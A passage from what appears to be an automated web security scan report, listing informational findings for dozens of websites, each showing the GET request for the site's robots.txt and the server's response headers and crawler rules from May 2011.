Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.881. http://www.interactiveseatingcharts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interactiveseatingcharts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interactiveseatingcharts.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:35 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 11 Feb 2009 18:48:51 GMT
ETag: "2f08b41-17d-e044ac0"
Accept-Ranges: bytes
Content-Length: 381
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /css/
Disallow: /images/
Disallow: /js/
Disallow: /dYlQQcmKEdAdiSRzwJ7kmEapRFXLlorJ68qiIcnMQRjN4DCGam99KOf24pRxi4CYXzSD3b3BiWwmQrW9QUzdBs4PpCb6oEAMJeGRkRafifLas2u6pBXZdKwIf
...[SNIP]...

27.882. http://www.interior-design-it-yourself.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interior-design-it-yourself.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interior-design-it-yourself.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:39 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.interior-design-it-yourself.com/7YrF8aGF.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Dis
...[SNIP]...

27.883. http://www.intermedia.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intermedia.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intermedia.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/plain
Last-Modified: Tue, 12 Oct 2010 08:54:02 GMT
Accept-Ranges: bytes
ETag: "444b8e4eb69cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Date: Wed, 04 May 2011 01:23:43 GMT
Connection: close
Content-Length: 71

User-agent: *
Disallow: /*.axd$


User-agent: *
Disallow: /*.asmx$

27.884. http://www.internationaljobs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internationaljobs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.internationaljobs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:51:19 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2011 19:51:45 GMT
ETag: "190082e-1e-49e120efe7640"
Accept-Ranges: bytes
Content-Length: 30
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /a/



27.885. http://www.inthe00s.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inthe00s.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inthe00s.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_jk/1.2.30
Last-Modified: Fri, 07 Sep 2007 14:56:26 GMT
ETag: "dc20ce-2b0-4398cd9324e40"
Accept-Ranges: bytes
Content-Length: 688
Connection: close
Content-Type: text/plain; charset=utf-8

Sitemap: http://www.inthe00s.com/archive/sitemap.xml

User-agent: *
Disallow: /index.php
Disallow: /index.php?action=search
Disallow: /index.php?action=calendar
Disallow: /index.php?action=login
Disal
...[SNIP]...

27.886. http://www.intrustdomainsstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intrustdomainsstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intrustdomainsstore.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:52 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Tue, 01 Feb 2011 11:25:19 GMT
ETag: "1bd1df8-54-49b36c98f65c0"
Accept-Ranges: bytes
Content-Length: 84
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /domains/
Disallow: /domains
Disallow: /store
Allow: /

27.887. http://www.invegasustenna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invegasustenna.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.invegasustenna.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:14 GMT
Server: Apache
Last-Modified: Thu, 02 Dec 2010 16:24:04 GMT
ETag: "1af24ee-65b-4966fd9a75100"
Accept-Ranges: bytes
Content-Length: 1627
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

27.888. http://www.inventionhome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inventionhome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inventionhome.com

Response

HTTP/1.1 200 OK
Content-Length: 63
Content-Type: text/plain
Last-Modified: Wed, 06 May 2009 19:00:12 GMT
Accept-Ranges: bytes
ETag: "4ac571e27ccec91:3a87"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:25:54 GMT
Connection: close

User-Agent: *
Disallow: /InvPortfolio/portfsite.aspx
Allow: /

27.889. http://www.investmentnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.investmentnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.investmentnews.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 08 Oct 2010 16:32:33 GMT
Accept-Ranges: bytes
ETag: "80a67268667cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 00:52:47 GMT
Content-Length: 946
Age: 1114
X-Cache: HIT from crsquid02
X-Cache-Lookup: HIT from crsquid02:80
Via: 1.0 crsquid02 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /apps/pbcs.dll/temaoversikt
Disallow: /apps/pbcs.dll/related
Disallow:
...[SNIP]...

27.890. http://www.inyork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inyork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inyork.com

Response

HTTP/1.0 200 OK
Content-Length: 113
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 22:15:36 GMT
Accept-Ranges: bytes
ETag: "074a8411a16ca1:3044"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Wed, 04 May 2011 03:24:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:24:07 GMT
Connection: close

User-agent: *
Disallow: /portlet/
Disallow: /circare/
Crawl-delay: 5

Sitemap: http://www.inyork.com/sitemap.xml

27.891. http://www.ip-lookup.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ip-lookup.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ip-lookup.net

Response

HTTP/1.1 200 OK
Set-Cookie: 720plan=R3438298076; path=/; expires=Fri, 06-May-2011 13:36:46 GMT
Date: Wed, 04 May 2011 01:32:19 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Sat, 03 Sep 2005 13:55:54 GMT
Accept-Ranges: bytes
Content-Length: 404
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /conversion
Disallow: /information
Disallow: /goto
Disallow: /local-ip
Disallow: /neighborhood
Disallow: /ping
Disallow: /related
Disallow: /whois
Disallow: /whois-ip
Disallow:
...[SNIP]...

27.892. http://www.iphonefaq.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iphonefaq.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iphonefaq.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:42:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 14 Oct 2010 20:10:35 GMT
ETag: "1698b24-6ae-492994d8424c0"
Accept-Ranges: bytes
Content-Length: 1710
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:42:05 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7 2007/01/08 12:02:18 dries Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites li
...[SNIP]...

27.893. http://www.iphonespies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iphonespies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iphonespies.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:57:29 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 16 Mar 2011 22:57:37 GMT
ETag: "283e0d52-3f7-49ea178981a40"
Accept-Ranges: bytes
Content-Length: 1015
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /wp-
Disallow: /search
Disallow: /feed
Disallow: /comments
Disallow: /comments/feed
Disallow: /feed/$
Disallow: /*/feed/$
Disallow: /*/feed/rss/$
Disallow: /*/trackback/$
Disa
...[SNIP]...

27.894. http://www.irenew.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irenew.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.irenew.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:40 GMT
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Accept-Ranges: bytes
Last-Modified: Sat, 19 Feb 2011 17:19:48 GMT
Content-Length: 42
Set-Cookie: X-Mapping-abiknkkh=0EA1EC36232A714507A56F2699258741; path=/
Connection: close

User-agent: *
Disallow: /admin/
Allow: /


27.895. http://www.irfanview.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irfanview.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.irfanview.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:46 GMT
Server: Apache/2.2
Last-Modified: Fri, 28 Apr 2006 14:43:09 GMT
ETag: "82811220-ad-4127eb930b940"
Accept-Ranges: bytes
Content-Length: 173
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images
Disallow: /test
Disallow: /update
Disallow: /statistik
Disallow: /newstatistik
Disallow: /foto
Disallow: /cgi-bin
Disallow: /google

27.896. http://www.iscow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iscow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iscow.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Sat, 12 Mar 2011 14:57:49 GMT
Accept-Ranges: bytes
ETag: "c064cddac5e0cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:10:01 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


27.897. http://www.iso.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iso.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iso.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:48 GMT
Server: Apache/2.2.11 (Unix)
Last-Modified: Wed, 17 Dec 2008 10:32:35 GMT
ETag: "575984-342-45e3b981d96c0"
Accept-Ranges: bytes
Content-Length: 834
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /iso/en/search.html
Disallow: /iso/fr/search.html
Disallow: /iso/search.html
Disallow: /iso/search/extendedsearchstandards.htm
Disallow: /iso/en/search/extendedsearchstandards.
...[SNIP]...

27.898. http://www.israellycool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.israellycool.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.israellycool.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:13:03 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "331-4b3971c7-0"
Last-Modified: Tue, 29 Dec 2009 03:04:39 GMT
Content-Type: text/plain
Content-Length: 817
X-Powered-By: W3 Total Cache/0.9.1.3

User-Agent: *
Crawl-Delay: 10
Disallow: /ar/
Disallow: /be/
Disallow: /bg/
Disallow: /ca/
Disallow: /cr/
Disallow: /cs/
Disallow: /da/
Disallow: /de/
Disallow: /el/
Disallow: /en/
Disallow: /es/
Disal
...[SNIP]...

27.899. http://www.isuppress.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.isuppress.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.isuppress.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:15:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 26 Apr 2011 05:28:45 GMT
ETag: "224763-cc-990c5d40"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.900. http://www.isvonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.isvonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.isvonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:37 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 17:24:38 GMT
ETag: "20b6a-22-4d0b9cd6"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /reports/

27.901. http://www.itmonline.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itmonline.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itmonline.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:10:21 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Fri, 04 Apr 2003 20:30:01 GMT
ETag: "d0183-85-3ba81036aa440"
Accept-Ranges: bytes
Content-Length: 133
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for www.itmonline.org
# email webmaster@itmonline.org with any problems
User-agent: *
disallow: /cgi-bin
disallow: java

27.902. http://www.itriagehealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itriagehealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itriagehealth.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:47 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/3.0.7
Last-Modified: Thu, 21 Apr 2011 20:33:24 GMT
ETag: "5cc2f0-26a-4a173a71f4d00"
Accept-Ranges: bytes
Content-Length: 618
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.903. http://www.itwire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itwire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itwire.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:53:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.13
Last-Modified: Wed, 27 Jan 2010 20:11:08 GMT
ETag: "46a2cd-130-47e2b00be2f00"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.904. http://www.izlesene.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.izlesene.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.izlesene.com

Response

HTTP/1.0 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 540
Connection: close
Date: Wed, 04 May 2011 01:21:19 GMT
Server: Nokta

User-agent: *
Allow: /
Disallow: /bar/
Disallow: /bar_premium/
Disallow: /actions/
Disallow: /actionsv3/
Disallow: /_jx/
Disallow: /panel/

User-agent: Googlebot
Allow: /
Disallow: /bar/
Disallow: /ba
...[SNIP]...

27.905. http://www.j-body.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.j-body.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.j-body.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:09 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7i
Last-Modified: Mon, 10 Apr 2006 17:34:08 GMT
ETag: "22801-24-443a9710"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain


User-agent: Fasterfox
Disallow: /


27.906. http://www.jacobsen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacobsen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jacobsen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 28 Sep 2009 10:20:35 GMT
Accept-Ranges: bytes
Content-Length: 164
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 03:16:57 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin
Disallow: /dealer_list.php
Disallow: /product_list.php
Disallow: /product_details.php

User-agent: jobs.de-Robot
Disallow: /

27.907. http://www.jailbaitgirls.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jailbaitgirls.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jailbaitgirls.info

Response

HTTP/1.1 200 OK
Content-Length: 103
Content-Type: text/plain
Last-Modified: Fri, 11 Feb 2011 07:11:06 GMT
Accept-Ranges: bytes
ETag: "0e17ad9bac9cb1:425"
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 03:04:37 GMT
Connection: close

User-agent: *
Disallow: /inquiry.html
Disallow: /partner
Disallow: /tracking
Disallow: /behavioural

27.908. http://www.jailtojob.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jailtojob.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jailtojob.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:14 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Fri, 27 Aug 2010 07:13:42 GMT
ETag: "1ef4361-16-48ec8dacb0a93"
Cache-Control: max-age=14400, public
Expires: Wed, 04 May 2011 05:36:30 GMT
Content-Length: 22
Age: 1303

User-Agent: *
Allow: /

27.909. http://www.japanesematures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanesematures.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.japanesematures.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:52 GMT
Server: Apache
Last-Modified: Fri, 15 Oct 2010 13:38:03 GMT
ETag: "26cb1c3-19-4cb8593b"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.910. http://www.japanesesportcars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanesesportcars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.japanesesportcars.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:59 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Pingback: http://www.japanesesportcars.com/wordpress/xmlrpc.php
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.911. http://www.jasonaldean.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jasonaldean.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jasonaldean.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:05:28 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 22:22:13 GMT
ETag: "a5742-186-4929b24460f40"
Accept-Ranges: bytes
Content-Length: 390
Connection: close
Content-Type: text/plain
Via: 1.1 nightrider (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=c0a8004b50; path=/; expires=Tue, 03 May 2011 21:08:44 GMT

# NOTE: Disallow: /*? means the bot should ignore any pages with a ? in them.

# Google
User-agent: Googlebot
# Crawl-delay: 30 -- Googlebot ignores crawl-delay
Disallow: /*?

# Yahoo!
User-agent: Slu
...[SNIP]...

27.912. http://www.jazzradio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jazzradio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jazzradio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:27 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 11 Aug 2009 19:47:32 GMT
ETag: "2542ae-67-470e2f9295d00"
Accept-Ranges: bytes
Content-Length: 103
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_nowplaying.stats1.php
Allow: /
Sitemap: http://www.jazzradio.com/sitemap.gz


27.913. http://www.jcmotors.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jcmotors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jcmotors.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 Aug 2008 00:16:22 GMT
Accept-Ranges: bytes
ETag: "0f50a610fcc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:19:56 GMT
Connection: close
Content-Length: 560

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.914. http://www.jcpenneyoptical.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jcpenneyoptical.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jcpenneyoptical.com

Response

HTTP/1.1 200 OK
Content-Length: 767
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 15:13:18 GMT
Accept-Ranges: bytes
ETag: "6ea9a3136eacb1:65f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:49 GMT
Connection: close

User-agent: *
Disallow: /theeye/
Disallow: /eyewear_expo/
Disallow: /dec09/
Disallow: /nov09/
Disallow: /oct08/
Disallow: /sept09/
Disallow: /august09/
Disallow: /july09/
Disallow: /june09/

...[SNIP]...

27.915. http://www.jeffcopublicschools.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jeffcopublicschools.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jeffcopublicschools.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:00 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.7 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 30 Nov 2010 23:31:03 GMT
ETag: "1024-84-4964d94fb7bc0"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.916. http://www.jeffkottkamp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jeffkottkamp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jeffkottkamp.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:06 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 28 Oct 2010 18:20:24 GMT
ETag: "43d450b-168-493b1653f8a00"
Accept-Ranges: bytes
Content-Length: 360
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.917. http://www.jeld-wen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jeld-wen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jeld-wen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 21 Dec 2010 19:11:48 GMT
ETag: "dd95af-f5-497f0687fe500"
Accept-Ranges: bytes
Content-Length: 245
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /modules/
Disallow: /plugins/
Disallow: /t
...[SNIP]...

27.918. http://www.jesseshunting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jesseshunting.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jesseshunting.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:10:50 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.17
Last-Modified: Tue, 18 Jan 2011 23:05:17 GMT
ETag: "17f17-ad-49a26ef0ec540"
Accept-Ranges: bytes
Content-Length: 173
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /oscommerce/personal/
Disallow: /oscommerce/includes/
Disallow: /oscommerce/cgi-bin/
Disallow: /oscommerce/banned/
Disallow: /oscommerce/blocked.php

27.919. http://www.jessicasimpsoncollection.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jessicasimpsoncollection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jessicasimpsoncollection.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:40 GMT
Server: IBM_HTTP_Server
